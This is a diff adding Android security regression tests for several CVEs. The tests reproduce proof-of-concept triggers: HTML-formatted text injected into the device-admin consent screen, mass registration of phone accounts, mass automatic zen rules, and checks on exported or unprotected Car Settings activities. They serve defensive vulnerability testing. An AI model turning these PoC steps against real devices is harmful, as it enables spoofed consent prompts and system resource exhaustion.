+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import java.util.concurrent.CompletableFuture;
+import java.util.concurrent.TimeUnit;
+import java.util.regex.Pattern;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2021_0600 extends StsExtraBusinessLogicTestCase {
+    private static final long TIMEOUT_MS = 5000;
+    private CompletableFuture<String> mPocActivityReturn;
+    private UiDevice mDevice;
+    private Context mContext;
+
+    // b/179042963
+    // Vulnerable package : com.android.settings (As per AOSP code)
+    // Vulnerable app     : Settings.apk (As per AOSP code)
+    @AsbSecurityTest(cveBugId = 179042963)
+    @Test
+    public void testPocCVE_2021_0600() {
+        try {
+            Instrumentation instrumentation = getInstrumentation();
+            mDevice = UiDevice.getInstance(instrumentation);
+            mContext = instrumentation.getContext();
+
+            // Registering a broadcast receiver to receive broadcast from PocActivity.
+            mPocActivityReturn = new CompletableFuture<>();
+            BroadcastReceiver broadcastReceiver = new BroadcastReceiver() {
+                @Override
+                public void onReceive(Context context, Intent intent) {
+                    try {
+                        mPocActivityReturn.complete(intent.getStringExtra(
+                                mContext.getString(R.string.cve_2021_0600_keyException)));
+                    } catch (Exception e) {
+                        // ignore.
+                    }
+                }
+            };
+            mContext.registerReceiver(broadcastReceiver,
+                    new IntentFilter(mContext.getString(R.string.cve_2021_0600_action)));
+
+            // Launch the PocActivity which in turn starts DeviceAdminAdd activity with normal
+            // text as 'explanation'.
+            Intent intent = new Intent(mContext, PocActivity.class);
+            intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK | Intent.FLAG_ACTIVITY_CLEAR_TASK);
+            intent.putExtra(mContext.getString(R.string.cve_2021_0600_keyHtml), false);
+            mContext.startActivity(intent);
+            String pocActivityException = mPocActivityReturn.get(TIMEOUT_MS, TimeUnit.MILLISECONDS);
+            assumeTrue(pocActivityException, pocActivityException.trim()
+                    .equals(mContext.getString(R.string.cve_2021_0600_noException)));
+
+            // Get the height of the normal text with no formatting. Because width is same both
+            // with and without fix, height is being used for comparing the with and without
+            // fix behaviour.
+            int heightWoHtml = getVulnerableUIHeight();
+            assumeTrue(heightWoHtml != -1);
+
+            // Launch PocActivity again such that DeviceAdminAdd activity starts with formatted text
+            // this time.
+            mPocActivityReturn = new CompletableFuture<>();
+            intent.putExtra(mContext.getString(R.string.cve_2021_0600_keyHtml), true);
+            mContext.startActivity(intent);
+            pocActivityException = mPocActivityReturn.get(TIMEOUT_MS, TimeUnit.MILLISECONDS);
+            assumeTrue(pocActivityException, pocActivityException
+                    .equalsIgnoreCase(mContext.getString(R.string.cve_2021_0600_noException)));
+
+            // Get the height of HTML text with formatting.
+            int heightWithHtml = getVulnerableUIHeight();
+            assumeTrue(heightWithHtml != -1);
+
+            // On vulnerable device, the text displayed on the screen will be HTML formatted, so
+            // there will be considerable increase in height of the text due to <h1> tag, if there
+            // is at least 20% increase in height, the test will fail.
+            assertFalse(mContext.getString(R.string.cve_2021_0600_failMsg),
+                    heightWithHtml > 1.2 * heightWoHtml);
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+
+    private int getVulnerableUIHeight() {
+        Pattern pattern = Pattern.compile(mContext.getString(R.string.cve_2021_0600_pattern),
+                Pattern.CASE_INSENSITIVE);
+        BySelector selector = By.text(pattern);
+        assumeTrue(mContext.getString(R.string.cve_2021_0600_patternNotFound, pattern),
+                mDevice.wait(Until.hasObject(selector), TIMEOUT_MS));
+        UiObject2 obj = mDevice.findObject(selector);
+        if (obj != null && obj.getText() != null
+                && obj.getText().contains(mContext.getString(R.string.cve_2021_0600_targetText))) {
+            Rect bounds = obj.getVisibleBounds();
+            return bounds.bottom - bounds.top;
+        }
+        return -1;
+    }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0600/PocActivity.java b/tests/tests/security/src/android/security/cts/CVE_2021_0600/PocActivity.java
new file mode 100644
index 0000000..2634a42
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0600/PocActivity.java
@@ -0,0 +1,86 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_0600;
+
+import static org.junit.Assume.assumeFalse;
+import static org.junit.Assume.assumeNotNull;
+
+import android.app.Activity;
+import android.app.admin.DevicePolicyManager;
+import android.content.ComponentName;
+import android.content.Intent;
+import android.os.Bundle;
+import android.security.cts.R;
+import android.text.Html;
+
+// The vulnerable activity ADD_DEVICE_ADMIN can't be started as a new task hence PocActivity is
+// created to launch it.
+public class PocActivity extends Activity {
+
+    @Override
+    protected void onCreate(Bundle savedInstanceState) {
+        try {
+            super.onCreate(savedInstanceState);
+
+            // Create an intent to launch DeviceAdminAdd activity.
+            Intent intent = new Intent(DevicePolicyManager.ACTION_ADD_DEVICE_ADMIN);
+            assumeNotNull(getString(R.string.cve_2021_0600_intentNotFound, intent),
+                    intent.resolveActivity(getPackageManager()));
+            intent.putExtra(DevicePolicyManager.EXTRA_DEVICE_ADMIN,
+                    new ComponentName(this, PocDeviceAdminReceiver.class));
+
+            // For adding an extra 'explanation' to the intent, creating a charsequence object.
+            CharSequence seq = Html.fromHtml(getString(R.string.cve_2021_0600_targetText));
+            if (getIntent().getBooleanExtra(getString(R.string.cve_2021_0600_keyHtml), false)) {
+                seq = Html.fromHtml(getString(R.string.cve_2021_0600_targetTextHtml));
+            }
+
+            // Using Html.fromHtml() causes whitespaces to occur at the start/end of the text which
+            // are unwanted. Remove the whitespace characters if any at the start and end of the
+            // charsequence.
+            int end = seq.length() - 1;
+            int start = 0;
+            while ((Character.isWhitespace(seq.charAt(start))) && start < end) {
+                ++start;
+            }
+            while ((Character.isWhitespace(seq.charAt(end))) && end > start) {
+                --end;
+            }
+
+            // Check if the charsequence is valid after trimming the whitespaces.
+            assumeFalse(getString(R.string.cve_2021_0600_errorCreateCharSeq), start > end);
+
+            // Adding the extra 'explanation' and launching the activity.
+            intent.putExtra(DevicePolicyManager.EXTRA_ADD_EXPLANATION,
+                    seq.subSequence(start, end + 1));
+            startActivity(intent);
+
+            // Send a broadcast to indicate no exceptions occurred.
+            sendBroadcast(new Intent(getString(R.string.cve_2021_0600_action)).putExtra(
+                    getString(R.string.cve_2021_0600_keyException),
+                    getString(R.string.cve_2021_0600_noException)));
+        } catch (Exception e) {
+            try {
+                // Send a broadcast to report exception.
+                sendBroadcast(new Intent(getString(R.string.cve_2021_0600_action))
+                        .putExtra(getString(R.string.cve_2021_0600_keyException), e.getMessage()));
+            } catch (Exception ignored) {
+                // ignore.
+            }
+        }
+    }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/tests/tests/security/src/android/security/cts/CVE_2021_0600/PocDeviceAdminReceiver.java
similarity index 72%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to tests/tests/security/src/android/security/cts/CVE_2021_0600/PocDeviceAdminReceiver.java
index 4416990..4d429cf 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0600/PocDeviceAdminReceiver.java
@@ -1,5 +1,5 @@
 /*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2023 The Android Open Source Project
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
@@ -14,9 +14,9 @@
  * limitations under the License.
  */
 
-package android.security.cts.CVE_2022_20143;
+package android.security.cts.CVE_2021_0600;
 
-import android.app.Activity;
+import android.app.admin.DeviceAdminReceiver;
 
-public class PocActivity extends Activity {
+public class PocDeviceAdminReceiver extends DeviceAdminReceiver {
 }
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_39738.java b/tests/tests/security/src/android/security/cts/CVE_2021_39738.java
new file mode 100644
index 0000000..7d8daea
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_39738.java
@@ -0,0 +1,64 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+
+import static org.junit.Assert.assertTrue;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.content.ComponentName;
+import android.content.Context;
+import android.content.pm.PackageManager;
+import android.platform.test.annotations.AsbSecurityTest;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2021_39738 extends StsExtraBusinessLogicTestCase {
+
+    @AsbSecurityTest(cveBugId = 216190509)
+    @Test
+    public void testPocCVE_2021_39738() {
+        try {
+            Context context = getApplicationContext();
+            PackageManager pm = context.getPackageManager();
+
+            // Skip test for non-automotive builds
+            assumeTrue(
+                    "Skipping test: " + PackageManager.FEATURE_AUTOMOTIVE + " missing",
+                    pm.hasSystemFeature(PackageManager.FEATURE_AUTOMOTIVE));
+
+            // BluetoothPairingDialog activity should require BLUETOOTH_PRIVILEGED permission
+            final String pkgName = "com.android.car.settings";
+            ComponentName component =
+                    new ComponentName(pkgName, pkgName + ".bluetooth.BluetoothPairingDialog");
+            String permission = pm.getActivityInfo(component, 0 /* flags */).permission;
+            assertTrue(
+                    "Vulnerable to b/216190509",
+                    permission.contains(android.Manifest.permission.BLUETOOTH_PRIVILEGED));
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20129/CVE_2022_20129.java b/tests/tests/security/src/android/security/cts/CVE_2022_20129/CVE_2022_20129.java
new file mode 100644
index 0000000..45cc049
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2022_20129/CVE_2022_20129.java
@@ -0,0 +1,120 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2022_20129;
+
+import static android.Manifest.permission.MODIFY_PHONE_STATE;
+import static android.telecom.PhoneAccount.CAPABILITY_CALL_PROVIDER;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+
+import android.app.Instrumentation;
+import android.app.UiAutomation;
+import android.content.ComponentName;
+import android.content.Context;
+import android.platform.test.annotations.AsbSecurityTest;
+import android.telecom.PhoneAccount;
+import android.telecom.PhoneAccountHandle;
+import android.telecom.TelecomManager;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.ArrayList;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2022_20129 extends StsExtraBusinessLogicTestCase {
+
+    @AsbSecurityTest(cveBugId = 217934478)
+    @Test
+    public void testPocCVE_2022_20129() {
+        // maxPhoneAccounts = 10 * MAX_PHONE_ACCOUNT_REGISTRATIONS to accommodate code customization
+        final int maxPhoneAccounts = 100;
+        boolean isVulnerable = false;
+        int phoneAccounts = 0;
+        ArrayList<PhoneAccountHandle> phoneAccountHandleList = new ArrayList<PhoneAccountHandle>();
+        Context context = null;
+        TelecomManager telecomManager = null;
+        UiAutomation uiAutomation = null;
+        try {
+            Instrumentation instrumentation = getInstrumentation();
+            context = instrumentation.getContext();
+            telecomManager = context.getSystemService(TelecomManager.class);
+            uiAutomation = instrumentation.getUiAutomation();
+
+            // Store the number of phoneaccounts present before test run
+            uiAutomation.adoptShellPermissionIdentity(MODIFY_PHONE_STATE);
+            phoneAccounts = telecomManager.getAllPhoneAccountHandles().size();
+
+            // Create and register 'maxPhoneAccounts' phoneAccounts
+            String packageName = context.getPackageName();
+            for (int i = 0; i < maxPhoneAccounts; ++i) {
+                PhoneAccountHandle handle =
+                        new PhoneAccountHandle(
+                                new ComponentName(packageName, PocService.class.getName()),
+                                packageName + i);
+                PhoneAccount account =
+                        new PhoneAccount.Builder(handle, packageName + i)
+                                .setCapabilities(CAPABILITY_CALL_PROVIDER)
+                                .addSupportedUriScheme(PhoneAccount.SCHEME_TEL)
+                                .build();
+                phoneAccountHandleList.add(handle);
+                try {
+                    telecomManager.registerPhoneAccount(account);
+                    isVulnerable = true;
+
+                    // Enable phoneAccount after registering so that it can be retrieved later using
+                    // getAllPhoneAccountHandles, making the test reliable
+                    telecomManager.enablePhoneAccount(
+                            account.getAccountHandle(), true /* isEnabled */);
+                } catch (IllegalArgumentException expected) {
+                    // This exception is expected with fix. Exception message isn't checked to
+                    // accommodate code customizations
+                    isVulnerable = false;
+                    break;
+                }
+            }
+        } catch (Exception e) {
+            assumeNoException(e);
+        } finally {
+            try {
+                // Retrieve the total number of phoneAccounts added by test
+                phoneAccounts = telecomManager.getAllPhoneAccountHandles().size() - phoneAccounts;
+                boolean allAccountsAdded = maxPhoneAccounts == phoneAccounts;
+
+                // Unregister all phoneaccounts used in test
+                for (PhoneAccountHandle handle : phoneAccountHandleList) {
+                    telecomManager.unregisterPhoneAccount(handle);
+                }
+                uiAutomation.dropShellPermissionIdentity();
+
+                // Test fails only if 'maxPhoneAccounts' phoneAccounts were added successfully in
+                // test and no exception occurred
+                assertFalse(
+                        "Device is vulnerable to b/217934478!!", isVulnerable && allAccountsAdded);
+            } catch (Exception ignored) {
+                // Ignore exceptions here
+            }
+        }
+    }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/tests/tests/security/src/android/security/cts/CVE_2022_20129/PocService.java
similarity index 74%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to tests/tests/security/src/android/security/cts/CVE_2022_20129/PocService.java
index 4416990..cd20396 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/tests/tests/security/src/android/security/cts/CVE_2022_20129/PocService.java
@@ -1,5 +1,5 @@
 /*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2023 The Android Open Source Project
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
@@ -14,9 +14,9 @@
  * limitations under the License.
  */
 
-package android.security.cts.CVE_2022_20143;
+package android.security.cts.CVE_2022_20129;
 
-import android.app.Activity;
+import android.telecom.ConnectionService;
 
-public class PocActivity extends Activity {
+public class PocService extends ConnectionService {
 }
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/CVE_2022_20143.java b/tests/tests/security/src/android/security/cts/CVE_2022_20143/CVE_2022_20143.java
deleted file mode 100644
index 3c08cbb..0000000
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/CVE_2022_20143.java
+++ /dev/null
@@ -1,117 +0,0 @@
-/*
- * Copyright (C) 2022 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- *      http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-package android.security.cts.CVE_2022_20143;
-
-import static org.junit.Assert.assertFalse;
-import static org.junit.Assume.assumeNoException;
-import static org.junit.Assume.assumeTrue;
-
-import android.app.AutomaticZenRule;
-import android.app.Instrumentation;
-import android.app.NotificationManager;
-import android.app.UiAutomation;
-import android.content.ComponentName;
-import android.content.Context;
-import android.net.Uri;
-import android.platform.test.annotations.AsbSecurityTest;
-import androidx.test.InstrumentationRegistry;
-import androidx.test.runner.AndroidJUnit4;
-
-import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
-
-import org.junit.Test;
-import org.junit.runner.RunWith;
-
-import java.util.ArrayList;
-
-@RunWith(AndroidJUnit4.class)
-public class CVE_2022_20143 extends StsExtraBusinessLogicTestCase {
-
-    @AsbSecurityTest(cveBugId = 220735360)
-    @Test
-    public void testPocCVE_2022_20143() {
-        final int ruleLimitPerPackage = 200;
-        final int timeoutDuration = 5000;
-        final int waitDuration = 100;
-        Instrumentation instrumentation;
-        Context context;
-        NotificationManager notificationManager = null;
-        String packageName = null;
-        UiAutomation uiautomation = null;
-        boolean isVulnerable = true;
-        boolean notificationPolicyAccessGranted = false;
-        int automaticZenRules = 0;
-        ArrayList<String> ruleIds = new ArrayList<>();
-        try {
-            instrumentation = InstrumentationRegistry.getInstrumentation();
-            context = instrumentation.getContext();
-            notificationManager = context.getSystemService(NotificationManager.class);
-            packageName = context.getPackageName();
-            uiautomation = instrumentation.getUiAutomation();
-            uiautomation.executeShellCommand("cmd notification allow_dnd " + packageName);
-            long startTime = System.currentTimeMillis();
-            while (System.currentTimeMillis() - startTime < timeoutDuration) {
-                // busy wait until notification policy access is granted
-                if (notificationManager.isNotificationPolicyAccessGranted()) {
-                    notificationPolicyAccessGranted = true;
-                    break;
-                }
-                Thread.sleep(waitDuration);
-            }
-            // storing the number of automaticZenRules present before test run
-            automaticZenRules = notificationManager.getAutomaticZenRules().size();
-            ComponentName component =
-                    new ComponentName(packageName, PocActivity.class.getCanonicalName());
-            for (int i = 0; i < ruleLimitPerPackage; ++i) {
-                Uri conditionId = Uri.parse("condition://android/" + i);
-                AutomaticZenRule rule = new AutomaticZenRule("ZenRuleName" + i, null, component,
-                        conditionId, null, NotificationManager.INTERRUPTION_FILTER_ALL, true);
-                String id = notificationManager.addAutomaticZenRule(rule);
-                ruleIds.add(id);
-            }
-        } catch (Exception e) {
-            if (e instanceof IllegalArgumentException) {
-                isVulnerable = false; // expected with fix
-            } else {
-                assumeNoException(e);
-            }
-        } finally {
-            try {
-                if (notificationPolicyAccessGranted) {
-                    /* retrieving the total number of automaticZenRules added by test so that the */
-                    /* test fails only if all automaticZenRules were added successfully */
-                    automaticZenRules =
-                            notificationManager.getAutomaticZenRules().size() - automaticZenRules;
-                    for (String id : ruleIds) {
-                        notificationManager.removeAutomaticZenRule(id);
-                    }
-                    uiautomation
-                            .executeShellCommand("cmd notification disallow_dnd " + packageName);
-                }
-                boolean allZenRulesAdded = ruleLimitPerPackage == automaticZenRules;
-                assumeTrue("Notification policy access not granted",
-                        notificationPolicyAccessGranted);
-                assertFalse(
-                        "Vulnerable to b/220735360!! System can be corrupted by adding many"
-                                + " AutomaticZenRules via NotificationManager#addAutomaticZenRule",
-                        isVulnerable && allZenRulesAdded);
-            } catch (Exception e) {
-                assumeNoException(e);
-            }
-        }
-    }
-}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20234.java b/tests/tests/security/src/android/security/cts/CVE_2022_20234.java
new file mode 100644
index 0000000..8d65cdb
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2022_20234.java
@@ -0,0 +1,69 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+
+import static com.google.common.truth.Truth.assertWithMessage;
+import static com.google.common.truth.TruthJUnit.assume;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.content.ComponentName;
+import android.content.Context;
+import android.content.pm.PackageManager;
+import android.platform.test.annotations.AsbSecurityTest;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2022_20234 extends StsExtraBusinessLogicTestCase {
+
+    @AsbSecurityTest(cveBugId = 225189301)
+    @Test
+    public void testPocCVE_2022_20234() {
+        try {
+            Context context = getApplicationContext();
+            PackageManager pm = context.getPackageManager();
+
+            // Skip test for non-automotive builds
+            assume().withMessage("Skipping test: " + PackageManager.FEATURE_AUTOMOTIVE + " missing")
+                    .that(pm.hasSystemFeature(PackageManager.FEATURE_AUTOMOTIVE))
+                    .isTrue();
+
+            // With fix, NotificationAccessConfirmationActivity is not exported
+            final String activityName = ".notifications.NotificationAccessConfirmationActivity";
+            final String pkgName = "com.android.car.settings";
+            ComponentName component = new ComponentName(pkgName, pkgName + activityName);
+            boolean exported = pm.getActivityInfo(component, 0 /* flags */).exported;
+            assertWithMessage(
+                            "Vulnerable to b/225189301!! "
+                                    + pkgName
+                                    + activityName
+                                    + "can be started from outside system process")
+                    .that(exported)
+                    .isFalse();
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20429/CVE_2022_20429.java b/tests/tests/security/src/android/security/cts/CVE_2022_20429/CVE_2022_20429.java
new file mode 100644
index 0000000..7c3b7de
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2022_20429/CVE_2022_20429.java
@@ -0,0 +1,179 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2022_20429;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.UiAutomation;
+import android.bluetooth.BluetoothAdapter;
+import android.bluetooth.BluetoothDevicePicker;
+import android.content.BroadcastReceiver;
+import android.content.Context;
+import android.content.Intent;
+import android.content.IntentFilter;
+import android.content.pm.PackageManager;
+import android.platform.test.annotations.AsbSecurityTest;
+import android.security.cts.R;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.concurrent.Semaphore;
+import java.util.concurrent.TimeUnit;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2022_20429 extends StsExtraBusinessLogicTestCase {
+    private BroadcastReceiver mBroadcastReceiver;
+    private Context mContext;
+    private Semaphore mBroadcastReceived;
+    private String mErrorMessage;
+    private UiAutomation mUiAutomation;
+    private boolean mBtState;
+    private int mStatusCode;
+
+    @AsbSecurityTest(cveBugId = 220741473)
+    @Test
+    public void testPocCVE_2022_20429() {
+        try {
+            Instrumentation instrumentation = getInstrumentation();
+            mContext = instrumentation.getContext();
+            PackageManager pm = mContext.getPackageManager();
+
+            // Skip test for non-automotive builds
+            assumeTrue(
+                    mContext.getString(
+                            R.string.cve_2022_20429_featureMissing,
+                            PackageManager.FEATURE_AUTOMOTIVE),
+                    pm.hasSystemFeature(PackageManager.FEATURE_AUTOMOTIVE));
+
+            // Skip test if bluetooth feature not available
+            assumeTrue(
+                    mContext.getString(
+                            R.string.cve_2022_20429_featureMissing,
+                            PackageManager.FEATURE_BLUETOOTH),
+                    pm.hasSystemFeature(PackageManager.FEATURE_BLUETOOTH));
+            mBroadcastReceived = new Semaphore(0);
+            mBtState = false;
+            mErrorMessage = "";
+            mStatusCode = getInteger(R.integer.cve_2022_20429_failure);
+            mUiAutomation = instrumentation.getUiAutomation();
+            mUiAutomation.adoptShellPermissionIdentity();
+
+            // Register BroadcastReceiver to receive status from PocActivity
+            mBroadcastReceiver =
+                    new BroadcastReceiver() {
+                        @Override
+                        public void onReceive(Context mContext, Intent intent) {
+                            try {
+                                if (intent.getAction()
+                                        .equals(
+                                                mContext.getString(
+                                                        R.string.cve_2022_20429_broadcastAction))) {
+                                    mStatusCode =
+                                            intent.getIntExtra(
+                                                    mContext.getString(
+                                                            R.string.cve_2022_20429_resultKey),
+                                                    getInteger(R.integer.cve_2022_20429_failure));
+                                    mErrorMessage =
+                                            intent.getStringExtra(
+                                                    mContext.getString(
+                                                            R.string.cve_2022_20429_messageKey));
+                                    mBroadcastReceived.release();
+                                } else if (intent.getAction()
+                                                .equals(BluetoothAdapter.ACTION_SCAN_MODE_CHANGED)
+                                        && intent.getIntExtra(
+                                                        BluetoothAdapter.EXTRA_SCAN_MODE,
+                                                        BluetoothAdapter.ERROR)
+                                                == BluetoothAdapter
+                                                        .SCAN_MODE_CONNECTABLE_DISCOVERABLE) {
+                                    mBroadcastReceived.release();
+                                }
+                            } catch (Exception ignored) {
+                                // Ignore exceptions here
+                            }
+                        }
+                    };
+            IntentFilter filter = new IntentFilter();
+            filter.addAction(mContext.getString(R.string.cve_2022_20429_broadcastAction));
+            filter.addAction(BluetoothAdapter.ACTION_SCAN_MODE_CHANGED);
+            mContext.registerReceiver(mBroadcastReceiver, filter);
+            BluetoothAdapter btAdapter = BluetoothAdapter.getDefaultAdapter();
+
+            // Save the state of bluetooth adapter to reset after the test
+            mBtState = btAdapter.isEnabled();
+
+            // Disable bluetooth if already enabled in 'SCAN_MODE_CONNECTABLE_DISCOVERABLE' mode
+            if (btAdapter.getScanMode() == BluetoothAdapter.SCAN_MODE_CONNECTABLE_DISCOVERABLE) {
+                switchBluetoothMode(BluetoothAdapter.ACTION_REQUEST_DISABLE);
+            }
+
+            // Enable bluetooth if in disabled state
+            if (!btAdapter.isEnabled()) {
+                switchBluetoothMode(BluetoothAdapter.ACTION_REQUEST_ENABLE);
+            }
+            mContext.startActivity(
+                    new Intent(BluetoothDevicePicker.ACTION_LAUNCH)
+                            .addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+            mBroadcastReceived.tryAcquire(
+                    getInteger(R.integer.cve_2022_20429_timeoutMs), TimeUnit.MILLISECONDS);
+
+            // Test fails if Bluetooth Scan mode changes to SCAN_MODE_CONNECTABLE_DISCOVERABLE
+            assertFalse(
+                    mContext.getString(R.string.cve_2022_20429_failMsg),
+                    btAdapter.getScanMode() == BluetoothAdapter.SCAN_MODE_CONNECTABLE_DISCOVERABLE);
+        } catch (Exception e) {
+            assumeNoException(e);
+        } finally {
+            try {
+                // Disable bluetooth if it was OFF before the test
+                if (!mBtState) {
+                    switchBluetoothMode(BluetoothAdapter.ACTION_REQUEST_DISABLE);
+                }
+                mUiAutomation.dropShellPermissionIdentity();
+            } catch (Exception e) {
+                // Ignore exceptions here
+            }
+        }
+    }
+
+    int getInteger(int resId) {
+        return mContext.getResources().getInteger(resId);
+    }
+
+    private void switchBluetoothMode(String action) throws Exception {
+        // Start PocActivity to switch bluetooth mode
+        Intent intent = new Intent(mContext, PocActivity.class);
+        intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+        intent.putExtra(mContext.getString(R.string.cve_2022_20429_btAction), action);
+        mContext.startActivity(intent);
+
+        // Wait until bluetooth mode switch is completed successfully
+        assumeTrue(
+                mBroadcastReceived.tryAcquire(
+                        getInteger(R.integer.cve_2022_20429_timeoutMs), TimeUnit.MILLISECONDS));
+        assumeTrue(mErrorMessage, mStatusCode != getInteger(R.integer.cve_2022_20429_failure));
+    }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20429/PocActivity.java b/tests/tests/security/src/android/security/cts/CVE_2022_20429/PocActivity.java
new file mode 100644
index 0000000..7883455
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2022_20429/PocActivity.java
@@ -0,0 +1,113 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
